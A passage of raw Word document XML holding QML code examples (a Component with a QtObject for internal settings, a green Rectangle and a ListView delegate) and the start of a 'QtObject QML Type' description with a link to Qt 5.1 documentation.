                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00797B11" w:rsidRPr="00797B11">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>{</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r w:rsidRPr="00797B11">
              <w:rPr>
                <w:rStyle w:val="kwd"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFF55"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>property</w:t>
            </w:r>
            <w:r w:rsidRPr="00797B11">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:hyperlink r:id="rId1501" w:history="1">
              <w:r w:rsidRPr="00797B11">
                <w:rPr>
                  <w:rStyle w:val="typ"/>
                  <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                  <w:color w:val="21BE2B"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Component</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00797B11">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> mycomponent</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comp1</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hyperlink r:id="rId1502" w:history="1">
              <w:r w:rsidRPr="00797B11">
                <w:rPr>
                  <w:rStyle w:val="typ"/>
                  <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                  <w:color w:val="21BE2B"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>QtObject</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00797B11">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00797B11">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>{</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id</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internalSettings</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r w:rsidRPr="00797B11">
              <w:rPr>
                <w:rStyle w:val="kwd"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFF55"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>property</w:t>
            </w:r>
            <w:r w:rsidRPr="00797B11">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> color color</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w:t>
            </w:r>
            <w:r w:rsidRPr="00797B11">
              <w:rPr>
                <w:rStyle w:val="str"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="AAAAAA"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>"green"</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r w:rsidRPr="00797B11">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>}</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hyperlink r:id="rId1503" w:history="1">
              <w:r w:rsidRPr="00797B11">
                <w:rPr>
                  <w:rStyle w:val="typ"/>
                  <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                  <w:color w:val="21BE2B"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Component</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00797B11">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00797B11">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>{</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id</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comp1</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00797B11" w:rsidRPr="000821BB" w:rsidRDefault="00797B11">
            <w:pPr>
              <w:pStyle w:val="HTML0"/>
              <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="262626"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000821BB">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="262626"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:hyperlink r:id="rId1504" w:history="1">
              <w:r w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="typ"/>
                  <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                  <w:color w:val="262626"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Rectangle</w:t>
              </w:r>
            </w:hyperlink>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color</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internalSettings</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color</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width</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lit"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="262626"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>400</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height</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lit"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="262626"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>50</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pun"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="262626"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>}</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rPr>
            </w:pPr>
            <w:r w:rsidRPr="00797B11">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00797B11">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00797B11" w:rsidRPr="00797B11" w:rsidRDefault="00797B11">
            <w:pPr>
              <w:pStyle w:val="HTML0"/>
              <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00797B11">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00797B11" w:rsidRPr="00797B11" w:rsidTr="00A50E12">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2427"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797B11" w:rsidRPr="00797B11" w:rsidRDefault="00797B11">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00797B11">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>main.qml</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="11868"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797B11" w:rsidRPr="00797B11" w:rsidRDefault="00490E7E">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505" w:history="1">
              <w:r w:rsidR="00797B11" w:rsidRPr="00797B11">
                <w:rPr>
                  <w:rStyle w:val="typ"/>
                  <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                  <w:color w:val="21BE2B"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ListView</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00797B11" w:rsidRPr="00797B11">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00797B11" w:rsidRPr="00797B11">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>{</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width</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w:t>
            </w:r>
            <w:r w:rsidRPr="00797B11">
              <w:rPr>
                <w:rStyle w:val="lit"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FF55FF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>400</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height</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w:t>
            </w:r>
            <w:r w:rsidRPr="00797B11">
              <w:rPr>
                <w:rStyle w:val="lit"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FF55FF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>400</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model</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w:t>
            </w:r>
            <w:r w:rsidRPr="00797B11">
              <w:rPr>
                <w:rStyle w:val="lit"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FF55FF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>5</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97B11">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00797B11">
              <w:rPr>
                <w:rStyle w:val="kwd"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFF55"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>delegate</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 myItem</w:t>
            </w:r>
            <w:r w:rsidRPr="00797B11">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="00797B11">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">mycomponent    </w:t>
            </w:r>
            <w:r w:rsidRPr="00797B11">
              <w:rPr>
                <w:rStyle w:val="com"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="55FFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>//will create green Rectangles</w:t>
            </w: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97B11" w:rsidRPr="00797B11" w:rsidRDefault="00797B11">
            <w:pPr>
              <w:pStyle w:val="HTML0"/>
              <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00797B11">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00797B11">
              <w:rPr>
                <w:rStyle w:val="typ"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="4F9D08"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>MyItem</w:t>
            </w:r>
            <w:r w:rsidRPr="00797B11">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00797B11">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>{</w:t>
            </w:r>
            <w:r w:rsidRPr="00797B11">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t xml:space="preserve"> id</w:t>
            </w:r>
            <w:r w:rsidRPr="00797B11">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidRPr="00797B11">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t xml:space="preserve"> myItem </w:t>
            </w:r>
            <w:r w:rsidRPr="00797B11">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00797B11" w:rsidRPr="00797B11" w:rsidRDefault="00797B11">
            <w:pPr>
              <w:pStyle w:val="HTML0"/>
              <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00797B11">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00A50E12" w:rsidRDefault="00A50E12" w:rsidP="00605F34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005A6BBD" w:rsidRPr="00D815C8" w:rsidRDefault="00490E7E" w:rsidP="00605F34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1506" w:history="1">
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>http://qt-project.org/doc/qt-5.1/qtqml/qml-qtqml2-qtobject.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="007C2FF8" w:rsidRPr="00A50E12" w:rsidRDefault="007C2FF8" w:rsidP="00A50E12">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1205" w:name="_Toc483000781"/>
      <w:bookmarkStart w:id="1206" w:name="_Toc483003779"/>
      <w:bookmarkStart w:id="1207" w:name="_Toc483604133"/>
      <w:bookmarkStart w:id="1208" w:name="_Toc483605353"/>
      <w:r w:rsidRPr="00A50E12">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QtObject QML Type</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1205"/>
      <w:bookmarkEnd w:id="1206"/>
      <w:bookmarkEnd w:id="1207"/>
      <w:bookmarkEnd w:id="1208"/>
    </w:p>
    <w:p w:rsidR="007C2FF8" w:rsidRPr="002736BE" w:rsidRDefault="007C2FF8" w:rsidP="00A50E12">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1209" w:name="_Toc483000782"/>
      <w:bookmarkStart w:id="1210" w:name="_Toc483003780"/>
      <w:bookmarkStart w:id="1211" w:name="_Toc483604134"/>
      <w:bookmarkStart w:id="1212" w:name="_Toc483605354"/>
      <w:r w:rsidRPr="00A50E12">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Detailed Description</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1209"/>
      <w:bookmarkEnd w:id="1210"/>
      <w:bookmarkEnd w:id="1211"/>
      <w:bookmarkEnd w:id="1212"/>
    </w:p>
    <w:p w:rsidR="007C2FF8" w:rsidRPr="007C2FF8" w:rsidRDefault="007C2FF8" w:rsidP="007C2FF8">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C2FF8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r w:rsidRPr="007C2FF8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1507" w:history="1">
        <w:r w:rsidRPr="007C2FF8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QtObject</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="007C2FF8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="007C2FF8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">type is a </w:t>
      </w:r>
      <w:r w:rsidRPr="007C2FF8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>non-visual element</w:t>
      </w:r>
      <w:r w:rsidRPr="007C2FF8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
